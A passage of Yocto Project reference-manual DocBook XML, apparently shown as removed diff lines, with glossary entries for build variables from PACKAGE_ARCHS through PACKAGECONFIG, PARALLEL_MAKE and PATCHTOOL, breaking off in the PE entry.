- PACKAGE_ARCHS[doc] = "A list of architectures compatible with the given target in order of priority."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of architectures compatible with
- the target machine.
- This variable is set automatically and should not
- normally be hand-edited.
- Entries are separated using spaces and listed in order
- of priority.
- The default value for
- <filename>PACKAGE_ARCHS</filename> is "all any noarch
- ${PACKAGE_EXTRA_ARCHS} ${MACHINE_ARCH}".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_BEFORE_PN'><glossterm>PACKAGE_BEFORE_PN</glossterm>
- <info>
- PACKAGE_BEFORE_PN[doc] = "Enables easily adding packages to PACKAGES before ${PN} so that the packages can pick up files that would normally be included in the default package."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Enables easily adding packages to
- <filename><link linkend='var-PACKAGES'>PACKAGES</link></filename>
- before <filename>${<link linkend='var-PN'>PN</link>}</filename>
- so that those added packages can pick up files that would normally be
- included in the default package.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_CLASSES'><glossterm>PACKAGE_CLASSES</glossterm>
- <info>
- PACKAGE_CLASSES[doc] = "This variable specifies the package manager to use when packaging data. It is set in the conf/local.conf file in the Build Directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- This variable, which is set in the
- <filename>local.conf</filename> configuration file found in
- the <filename>conf</filename> folder of the
- <link linkend='build-directory'>Build Directory</link>,
- specifies the package manager the OpenEmbedded build system
- uses when packaging data.
- </para>
-
- <para>
- You can provide one or more of the following arguments for
- the variable:
- <literallayout class='monospaced'>
- PACKAGE_CLASSES ?= "package_rpm package_deb package_ipk package_tar"
- </literallayout>
- <note><title>Warning</title>
- While it is a legal option, the
- <filename>package_tar</filename> class has limited
- functionality due to no support for package
- dependencies by that backend.
- Therefore, it is recommended that you do not use it.
- </note>
- The build system uses only the first argument in the list
- as the package manager when creating your image or SDK.
- However, packages will be created using any additional
- packaging classes you specify.
- For example, if you use the following in your
- <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- PACKAGE_CLASSES ?= "package_ipk"
- </literallayout>
- The OpenEmbedded build system uses the IPK package manager
- to create your image or SDK.
- </para>
-
- <para>
- For information on packaging and build performance effects
- as a result of the package manager in use, see the
- "<link linkend='ref-classes-package'><filename>package.bbclass</filename></link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_DEBUG_SPLIT_STYLE'><glossterm>PACKAGE_DEBUG_SPLIT_STYLE</glossterm>
- <info>
- PACKAGE_DEBUG_SPLIT_STYLE[doc] = "Determines how to split up the binary and debug information when creating *-dbg packages to be used with the GNU Project Debugger (GDB)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Determines how to split up the binary and debug information
- when creating <filename>*-dbg</filename> packages to be
- used with the GNU Project Debugger (GDB).
- </para>
-
- <para>
- With the
- <filename>PACKAGE_DEBUG_SPLIT_STYLE</filename> variable,
- you can control where debug information, which can include
- or exclude source files, is stored:
- <itemizedlist>
- <listitem><para>
- ".debug": Debug symbol files are placed next
- to the binary in a <filename>.debug</filename>
- directory on the target.
- For example, if a binary is installed into
- <filename>/bin</filename>, the corresponding debug
- symbol files are installed in
- <filename>/bin/.debug</filename>.
- Source files are placed in
- <filename>/usr/src/debug</filename>.
- </para></listitem>
- <listitem><para>
- "debug-file-directory": Debug symbol files are
- placed under <filename>/usr/lib/debug</filename>
- on the target, and separated by the path from where
- the binary is installed.
- For example, if a binary is installed in
- <filename>/bin</filename>, the corresponding debug
- symbols are installed in
- <filename>/usr/lib/debug/bin</filename>.
- Source files are placed in
- <filename>/usr/src/debug</filename>.
- </para></listitem>
- <listitem><para>
- "debug-without-src": The same behavior as
- ".debug" previously described with the exception
- that no source files are installed.
- </para></listitem>.
- <listitem><para>
- "debug-with-srcpkg": The same behavior as
- ".debug" previously described with the exception
- that all source files are placed in a separate
- <filename>*-src</filename> pkg.
- This is the default behavior.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- You can find out more about debugging using GDB by reading
- the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-gdb-remotedebug'>Debugging With the GNU Project Debugger (GDB) Remotely</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_EXCLUDE_COMPLEMENTARY'><glossterm>PACKAGE_EXCLUDE_COMPLEMENTARY</glossterm>
- <info>
- PACKAGE_EXCLUDE_COMPLEMENTARY[doc] = "Prevents specific packages from being installed when you are installing complementary packages."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Prevents specific packages from being installed when
- you are installing complementary packages.
- </para>
-
- <para>
- You might find that you want to prevent installing certain
- packages when you are installing complementary packages.
- For example, if you are using
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
- to install <filename>dev-pkgs</filename>, you might not want
- to install all packages from a particular multilib.
- If you find yourself in this situation, you can use the
- <filename>PACKAGE_EXCLUDE_COMPLEMENTARY</filename> variable
- to specify regular expressions to match the packages you
- want to exclude.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_EXCLUDE'><glossterm>PACKAGE_EXCLUDE</glossterm>
- <info>
- PACKAGE_EXCLUDE[doc] = "Packages to exclude from the installation. If a listed package is required, an error is generated."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists packages that should not be installed into an image.
- For example:
- <literallayout class='monospaced'>
- PACKAGE_EXCLUDE = "<replaceable>package_name</replaceable> <replaceable>package_name</replaceable> <replaceable>package_name</replaceable> ..."
- </literallayout>
- </para>
-
- <para>
- You can set this variable globally in your
- <filename>local.conf</filename> file or you can attach it to
- a specific image recipe by using the recipe name override:
- <literallayout class='monospaced'>
- PACKAGE_EXCLUDE_pn-<replaceable>target_image</replaceable> = "<replaceable>package_name</replaceable>"
- </literallayout>
- </para>
-
- <para>
- If you choose to not install
- a package using this variable and some other package is
- dependent on it (i.e. listed in a recipe's
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
- variable), the OpenEmbedded build system generates a fatal
- installation error.
- Because the build system halts the process with a fatal
- error, you can use the variable with an iterative
- development process to remove specific components from a
- system.
- </para>
-
- <para>
- Support for this variable exists only when using the
- IPK and RPM packaging backend.
- Support does not exist for DEB.
- </para>
-
- <para>
- See the
- <link linkend='var-NO_RECOMMENDATIONS'><filename>NO_RECOMMENDATIONS</filename></link>
- and the
- <link linkend='var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></link>
- variables for related information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_EXTRA_ARCHS'><glossterm>PACKAGE_EXTRA_ARCHS</glossterm>
- <info>
- PACKAGE_EXTRA_ARCHS[doc] = "Specifies the list of architectures compatible with the device CPU. This variable is useful when you build for several different devices that use miscellaneous processors."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the list of architectures compatible with the device CPU.
- This variable is useful when you build for several different devices that use
- miscellaneous processors such as XScale and ARM926-EJS.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_FEED_ARCHS'><glossterm>PACKAGE_FEED_ARCHS</glossterm>
- <info>
- PACKAGE_FEED_ARCHS[doc] = "Optionally specifies user-defined package architectures when constructing package feed URIs."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Optionally specifies the package architectures used as
- part of the package feed URIs during the build.
- When used, the <filename>PACKAGE_FEED_ARCHS</filename>
- variable is appended to the final package feed URI, which
- is constructed using the
- <link linkend='var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></link>
- and
- <link linkend='var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></link>
- variables.
- <note><title>Tip</title>
- You can use the <filename>PACKAGE_FEEDS_ARCHS</filename>
- variable to whitelist specific package architectures.
- If you do not need to whitelist specific architectures,
- which is a common case, you can omit this variable.
- Omitting the variable results in all available
- architectures for the current machine being included
- into remote package feeds.
- </note>
- </para>
-
- <para>
- Consider the following example where the
- <filename>PACKAGE_FEED_URIS</filename>,
- <filename>PACKAGE_FEED_BASE_PATHS</filename>, and
- <filename>PACKAGE_FEED_ARCHS</filename> variables are
- defined in your <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
- https://example.com/packagerepos/updates"
- PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
- PACKAGE_FEED_ARCHS = "all core2-64"
- </literallayout>
- Given these settings, the resulting package feeds are
- as follows:
- <literallayout class='monospaced'>
- https://example.com/packagerepos/release/rpm/all
- https://example.com/packagerepos/release/rpm/core2-64
- https://example.com/packagerepos/release/rpm-dev/all
- https://example.com/packagerepos/release/rpm-dev/core2-64
- https://example.com/packagerepos/updates/rpm/all
- https://example.com/packagerepos/updates/rpm/core2-64
- https://example.com/packagerepos/updates/rpm-dev/all
- https://example.com/packagerepos/updates/rpm-dev/core2-64
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_FEED_BASE_PATHS'><glossterm>PACKAGE_FEED_BASE_PATHS</glossterm>
- <info>
- PACKAGE_FEED_BASE_PATHS[doc] = "Specifies base path used when constructing package feed URIs."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the base path used when constructing package feed
- URIs.
- The <filename>PACKAGE_FEED_BASE_PATHS</filename> variable
- makes up the middle portion of a package feed URI used
- by the OpenEmbedded build system.
- The base path lies between the
- <link linkend='var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></link>
- and
- <link linkend='var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></link>
- variables.
- </para>
-
- <para>
- Consider the following example where the
- <filename>PACKAGE_FEED_URIS</filename>,
- <filename>PACKAGE_FEED_BASE_PATHS</filename>, and
- <filename>PACKAGE_FEED_ARCHS</filename> variables are
- defined in your <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
- https://example.com/packagerepos/updates"
- PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
- PACKAGE_FEED_ARCHS = "all core2-64"
- </literallayout>
- Given these settings, the resulting package feeds are
- as follows:
- <literallayout class='monospaced'>
- https://example.com/packagerepos/release/rpm/all
- https://example.com/packagerepos/release/rpm/core2-64
- https://example.com/packagerepos/release/rpm-dev/all
- https://example.com/packagerepos/release/rpm-dev/core2-64
- https://example.com/packagerepos/updates/rpm/all
- https://example.com/packagerepos/updates/rpm/core2-64
- https://example.com/packagerepos/updates/rpm-dev/all
- https://example.com/packagerepos/updates/rpm-dev/core2-64
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_FEED_URIS'><glossterm>PACKAGE_FEED_URIS</glossterm>
- <info>
- PACKAGE_FEED_URIS[doc] = "Specifies the front portion of the package feed URI used by the OpenEmbedded build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the front portion of the package feed URI
- used by the OpenEmbedded build system.
- Each final package feed URI is comprised of
- <filename>PACKAGE_FEED_URIS</filename>,
- <link linkend='var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></link>,
- and
- <link linkend='var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></link>
- variables.
- </para>
-
- <para>
- Consider the following example where the
- <filename>PACKAGE_FEED_URIS</filename>,
- <filename>PACKAGE_FEED_BASE_PATHS</filename>, and
- <filename>PACKAGE_FEED_ARCHS</filename> variables are
- defined in your <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
- https://example.com/packagerepos/updates"
- PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
- PACKAGE_FEED_ARCHS = "all core2-64"
- </literallayout>
- Given these settings, the resulting package feeds are
- as follows:
- <literallayout class='monospaced'>
- https://example.com/packagerepos/release/rpm/all
- https://example.com/packagerepos/release/rpm/core2-64
- https://example.com/packagerepos/release/rpm-dev/all
- https://example.com/packagerepos/release/rpm-dev/core2-64
- https://example.com/packagerepos/updates/rpm/all
- https://example.com/packagerepos/updates/rpm/core2-64
- https://example.com/packagerepos/updates/rpm-dev/all
- https://example.com/packagerepos/updates/rpm-dev/core2-64
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_INSTALL'><glossterm>PACKAGE_INSTALL</glossterm>
- <info>
- PACKAGE_INSTALL[doc] = "List of the packages to be installed into the image. The variable is generally not user-defined and uses IMAGE_INSTALL as part of the list."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The final list of packages passed to the package manager
- for installation into the image.
- </para>
-
- <para>
- Because the package manager controls actual installation
- of all packages, the list of packages passed using
- <filename>PACKAGE_INSTALL</filename> is not the final list
- of packages that are actually installed.
- This variable is internal to the image construction
- code.
- Consequently, in general, you should use the
- <link linkend='var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></link>
- variable to specify packages for installation.
- The exception to this is when working with
- the
- <link linkend='images-core-image-minimal-initramfs'><filename>core-image-minimal-initramfs</filename></link>
- image.
- When working with an initial RAM filesystem (initramfs)
- image, use the <filename>PACKAGE_INSTALL</filename>
- variable.
- For information on creating an initramfs, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_INSTALL_ATTEMPTONLY'><glossterm>PACKAGE_INSTALL_ATTEMPTONLY</glossterm>
- <info>
- PACKAGE_INSTALL_ATTEMPTONLY[doc] = "List of packages attempted to be installed when creating an image. If a listed package fails to install, the build system does not generate an error. This variable is generally not user-defined."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of packages the OpenEmbedded build
- system attempts to install when creating an image.
- If a listed package fails to install, the build system
- does not generate an error.
- This variable is generally not user-defined.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_PREPROCESS_FUNCS'><glossterm>PACKAGE_PREPROCESS_FUNCS</glossterm>
- <info>
- PACKAGE_PREPROCESS_FUNCS[doc] = "Specifies a list of functions run to pre-process the PKGD directory prior to splitting the files out to individual packages."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of functions run to pre-process the
- <link linkend='var-PKGD'><filename>PKGD</filename></link>
- directory prior to splitting the files out to individual
- packages.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_WRITE_DEPS'><glossterm>PACKAGE_WRITE_DEPS</glossterm>
- <info>
- PACKAGE_WRITE_DEPS[doc] = "Specifies post-installation and pre-installation script dependencies on native/cross tools."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of dependencies for post-installation and
- pre-installation scripts on native/cross tools.
- If your post-installation or pre-installation script can
- execute at rootfs creation time rather than on the
- target but depends on a native tool in order to execute,
- you need to list the tools in
- <filename>PACKAGE_WRITE_DEPS</filename>.
- </para>
-
- <para>
- For information on running post-installation scripts, see
- the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-post-installation-scripts'>Post-Installation Scripts</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGECONFIG'><glossterm>PACKAGECONFIG</glossterm>
- <info>
- PACKAGECONFIG[doc] = "This variable provides a means of enabling or disabling features of a recipe on a per-recipe basis."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- This variable provides a means of enabling or disabling
- features of a recipe on a per-recipe basis.
- <filename>PACKAGECONFIG</filename> blocks are defined
- in recipes when you specify features and then arguments
- that define feature behaviors.
- Here is the basic block structure (broken over multiple
- lines for readability):
- <literallayout class='monospaced'>
- PACKAGECONFIG ??= "f1 f2 f3 ..."
- PACKAGECONFIG[f1] = "\
- --with-f1, \
- --without-f1, \
- build-deps-for-f1, \
- runtime-deps-for-f1, \
- runtime-recommends-for-f1, \
- packageconfig-conflicts-for-f1 \
- "
- PACKAGECONFIG[f2] = "\
- ... and so on and so on ...
- </literallayout>
- </para>
-
- <para>
- The <filename>PACKAGECONFIG</filename>
- variable itself specifies a space-separated list of the
- features to enable.
- Following the features, you can determine the behavior of
- each feature by providing up to six order-dependent
- arguments, which are separated by commas.
- You can omit any argument you like but must retain the
- separating commas.
- The order is important and specifies the following:
- <orderedlist>
- <listitem><para>Extra arguments
- that should be added to the configure script
- argument list
- (<link linkend='var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></link>
- or
- <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>)
- if the feature is enabled.</para></listitem>
- <listitem><para>Extra arguments
- that should be added to <filename>EXTRA_OECONF</filename>
- or <filename>PACKAGECONFIG_CONFARGS</filename>
- if the feature is disabled.
- </para></listitem>
- <listitem><para>Additional build dependencies
- (<link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>)
- that should be added if the feature is enabled.
- </para></listitem>
- <listitem><para>Additional runtime dependencies
- (<link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>)
- that should be added if the feature is enabled.
- </para></listitem>
- <listitem><para>Additional runtime recommendations
- (<link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>)
- that should be added if the feature is enabled.
- </para></listitem>
- <listitem><para>Any conflicting (that is, mutually
- exclusive) <filename>PACKAGECONFIG</filename>
- settings for this feature.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- Consider the following
- <filename>PACKAGECONFIG</filename> block taken from the
- <filename>librsvg</filename> recipe.
- In this example the feature is <filename>gtk</filename>,
- which has three arguments that determine the feature's
- behavior.
- <literallayout class='monospaced'>
- PACKAGECONFIG[gtk] = "--with-gtk3,--without-gtk3,gtk+3"
- </literallayout>
- The <filename>--with-gtk3</filename> and
- <filename>gtk+3</filename> arguments apply only if
- the feature is enabled.
- In this case, <filename>--with-gtk3</filename> is
- added to the configure script argument list and
- <filename>gtk+3</filename> is added to
- <filename>DEPENDS</filename>.
- On the other hand, if the feature is disabled say through
- a <filename>.bbappend</filename> file in another layer, then
- the second argument <filename>--without-gtk3</filename> is
- added to the configure script instead.
- </para>
-
- <para>
- The basic <filename>PACKAGECONFIG</filename> structure
- previously described holds true regardless of whether you
- are creating a block or changing a block.
- When creating a block, use the structure inside your
- recipe.
- </para>
-
- <para>
- If you want to change an existing
- <filename>PACKAGECONFIG</filename> block, you can do so
- one of two ways:
- <itemizedlist>
- <listitem><para><emphasis>Append file:</emphasis>
- Create an append file named
- <replaceable>recipename</replaceable><filename>.bbappend</filename>
- in your layer and override the value of
- <filename>PACKAGECONFIG</filename>.
- You can either completely override the variable:
- <literallayout class='monospaced'>
- PACKAGECONFIG = "f4 f5"
- </literallayout>
- Or, you can just append the variable:
- <literallayout class='monospaced'>
- PACKAGECONFIG_append = " f4"
- </literallayout></para></listitem>
- <listitem><para><emphasis>Configuration file:</emphasis>
- This method is identical to changing the block
- through an append file except you edit your
- <filename>local.conf</filename> or
- <filename><replaceable>mydistro</replaceable>.conf</filename> file.
- As with append files previously described,
- you can either completely override the variable:
- <literallayout class='monospaced'>
- PACKAGECONFIG_pn-<replaceable>recipename</replaceable> = "f4 f5"
- </literallayout>
- Or, you can just amend the variable:
- <literallayout class='monospaced'>
- PACKAGECONFIG_append_pn-<replaceable>recipename</replaceable> = " f4"
- </literallayout></para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGECONFIG_CONFARGS'><glossterm>PACKAGECONFIG_CONFARGS</glossterm>
- <info>
- PACKAGECONFIG_CONFARGS[doc] = "A space-separated list of configuration options generated from the PACKAGECONFIG setting."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A space-separated list of configuration options generated
- from the
- <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>
- setting.
- </para>
-
- <para>
- Classes such as
- <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
- and
- <link linkend='ref-classes-cmake'><filename>cmake</filename></link>
- use <filename>PACKAGECONFIG_CONFARGS</filename> to pass
- <filename>PACKAGECONFIG</filename> options to
- <filename>configure</filename> and
- <filename>cmake</filename>, respectively.
- If you are using
- <filename>PACKAGECONFIG</filename> but not a class that
- handles the <filename>do_configure</filename> task, then
- you need to use
- <filename>PACKAGECONFIG_CONFARGS</filename> appropriately.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGEGROUP_DISABLE_COMPLEMENTARY'><glossterm>PACKAGEGROUP_DISABLE_COMPLEMENTARY</glossterm>
- <info>
- PACKAGEGROUP_DISABLE_COMPLEMENTARY[doc] = "Prevents automatic creation of the normal complementary packages such as -dev and -dbg in a packagegroup recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- For recipes inheriting the
- <link linkend='ref-classes-packagegroup'><filename>packagegroup</filename></link>
- class, setting
- <filename>PACKAGEGROUP_DISABLE_COMPLEMENTARY</filename> to
- "1" specifies that the normal complementary packages
- (i.e. <filename>-dev</filename>,
- <filename>-dbg</filename>, and so forth) should not be
- automatically created by the
- <filename>packagegroup</filename> recipe, which is the
- default behavior.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGES'><glossterm>PACKAGES</glossterm>
- <info>
- PACKAGES[doc] = "The list of packages the recipe creates."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The list of packages the recipe creates.
- The default value is the following:
- <literallayout class='monospaced'>
- ${PN}-dbg ${PN}-staticdev ${PN}-dev ${PN}-doc ${PN}-locale ${PACKAGE_BEFORE_PN} ${PN}
- </literallayout>
- </para>
-
- <para>
- During packaging, the
- <link linkend='ref-tasks-package'><filename>do_package</filename></link>
- task goes through <filename>PACKAGES</filename> and uses
- the
- <link linkend='var-FILES'><filename>FILES</filename></link>
- variable corresponding to each package to assign files to
- the package.
- If a file matches the <filename>FILES</filename> variable
- for more than one package in <filename>PACKAGES</filename>,
- it will be assigned to the earliest (leftmost) package.
- </para>
-
- <para>
- Packages in the variable's list that are empty (i.e. where
- none of the patterns in
- <filename>FILES_</filename><replaceable>pkg</replaceable>
- match any files installed by the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task) are not generated, unless generation is forced through
- the
- <link linkend='var-ALLOW_EMPTY'><filename>ALLOW_EMPTY</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGES_DYNAMIC'><glossterm>PACKAGES_DYNAMIC</glossterm>
- <info>
- PACKAGES_DYNAMIC[doc] = "A promise that your recipe satisfies runtime dependencies for optional modules that are found in other recipes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A promise that your recipe satisfies runtime dependencies
- for optional modules that are found in other recipes.
- <filename>PACKAGES_DYNAMIC</filename>
- does not actually satisfy the dependencies, it only states that
- they should be satisfied.
- For example, if a hard, runtime dependency
- (<link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>)
- of another package is satisfied
- at build time through the <filename>PACKAGES_DYNAMIC</filename>
- variable, but a package with the module name is never actually
- produced, then the other package will be broken.
- Thus, if you attempt to include that package in an image,
- you will get a dependency failure from the packaging system
- during the
- <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
- task.
- </para>
-
- <para>
- Typically, if there is a chance that such a situation can
- occur and the package that is not created is valid
- without the dependency being satisfied, then you should use
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
- (a soft runtime dependency) instead of
- <filename>RDEPENDS</filename>.
- </para>
-
- <para>
- For an example of how to use the <filename>PACKAGES_DYNAMIC</filename>
- variable when you are splitting packages, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#handling-optional-module-packaging'>Handling Optional Module Packaging</ulink>" section
- in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGESPLITFUNCS'><glossterm>PACKAGESPLITFUNCS</glossterm>
- <info>
- PACKAGESPLITFUNCS[doc] = "Specifies a list of functions run to perform additional splitting of files into individual packages."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of functions run to perform additional
- splitting of files into individual packages.
- Recipes can either prepend to this variable or prepend
- to the <filename>populate_packages</filename> function
- in order to perform additional package splitting.
- In either case, the function should set
- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>,
- <link linkend='var-FILES'><filename>FILES</filename></link>,
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
- and other packaging variables appropriately in order to
- perform the desired splitting.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PARALLEL_MAKE'><glossterm>PARALLEL_MAKE</glossterm>
- <info>
- PARALLEL_MAKE[doc] = "Specifies extra options that are passed to the make command during the compile tasks. This variable is usually in the form -j x, where x represents the maximum number of parallel threads make can run."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Extra options passed to the <filename>make</filename>
- command during the
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
- task in order to specify parallel compilation on the local
- build host.
- This variable is usually in the form "-j <replaceable>x</replaceable>",
- where <replaceable>x</replaceable> represents the maximum
- number of parallel threads <filename>make</filename> can
- run.
- <note><title>Caution</title>
- In order for <filename>PARALLEL_MAKE</filename> to be
- effective, <filename>make</filename> must be called
- with
- <filename>${</filename><link linkend='var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></link><filename>}</filename>.
- An easy way to ensure this is to use the
- <filename>oe_runmake</filename> function.
- </note>
- </para>
-
- <para>
- By default, the OpenEmbedded build system automatically
- sets this variable to be equal to the number of cores the
- build system uses.
- <note>
- If the software being built experiences dependency
- issues during the <filename>do_compile</filename>
- task that result in race conditions, you can clear
- the <filename>PARALLEL_MAKE</filename> variable within
- the recipe as a workaround.
- For information on addressing race conditions, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#debugging-parallel-make-races'>Debugging Parallel Make Races</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </note>
- For single socket systems (i.e. one CPU), you should not
- have to override this variable to gain optimal parallelism
- during builds.
- However, if you have very large systems that employ
- multiple physical CPUs, you might want to make sure the
- <filename>PARALLEL_MAKE</filename> variable is not
- set higher than "-j 20".
- </para>
-
- <para>
- For more information on speeding up builds, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#speeding-up-a-build'>Speeding Up a Build</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PARALLEL_MAKEINST'><glossterm>PARALLEL_MAKEINST</glossterm>
- <info>
- PARALLEL_MAKEINST[doc] = "Extra options passed to the make install command during the do_install task in order to specify parallel installation."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Extra options passed to the
- <filename>make install</filename> command during the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task in order to specify parallel installation.
- This variable defaults to the value of
- <link linkend='var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></link>.
- <note><title>Notes and Cautions</title>
- <para>In order for <filename>PARALLEL_MAKEINST</filename>
- to be
- effective, <filename>make</filename> must be called
- with
- <filename>${</filename><link linkend='var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></link><filename>}</filename>.
- An easy way to ensure this is to use the
- <filename>oe_runmake</filename> function.</para>
-
- <para>If the software being built experiences
- dependency issues during the
- <filename>do_install</filename> task that result in
- race conditions, you can clear the
- <filename>PARALLEL_MAKEINST</filename> variable within
- the recipe as a workaround.
- For information on addressing race conditions, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#debugging-parallel-make-races'>Debugging Parallel Make Races</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PATCHRESOLVE'><glossterm>PATCHRESOLVE</glossterm>
- <info>
- PATCHRESOLVE[doc] = "Enable or disable interactive patch resolution."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Determines the action to take when a patch fails.
- You can set this variable to one of two values: "noop" and
- "user".
- </para>
-
- <para>
- The default value of "noop" causes the build to simply fail
- when the OpenEmbedded build system cannot successfully
- apply a patch.
- Setting the value to "user" causes the build system to
- launch a shell and places you in the right location so that
- you can manually resolve the conflicts.
- </para>
-
- <para>
- Set this variable in your
- <filename>local.conf</filename> file.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PATCHTOOL'><glossterm>PATCHTOOL</glossterm>
- <info>
- PATCHTOOL[doc] = "Specifies the utility used to apply patches for a recipe during do_patch."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the utility used to apply patches for a recipe
- during the
- <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>
- task.
- You can specify one of three utilities: "patch", "quilt", or
- "git".
- The default utility used is "quilt" except for the
- quilt-native recipe itself.
- Because the quilt tool is not available at the
- time quilt-native is being patched, it uses "patch".
- </para>
-
- <para>
- If you wish to use an alternative patching tool, set the
- variable in the recipe using one of the following:
- <literallayout class='monospaced'>
- PATCHTOOL = "patch"
- PATCHTOOL = "quilt"
- PATCHTOOL = "git"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PE'><glossterm>PE</glossterm>
- <info>
- PE[doc] = "The epoch of the recipe. The default value is '0'. The field is used to make upgrades possible when the versioning scheme changes in some backwards incompatible way."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The epoch of the recipe.
- By default, this variable is unset.
- The variable is used to make upgrades possible when the
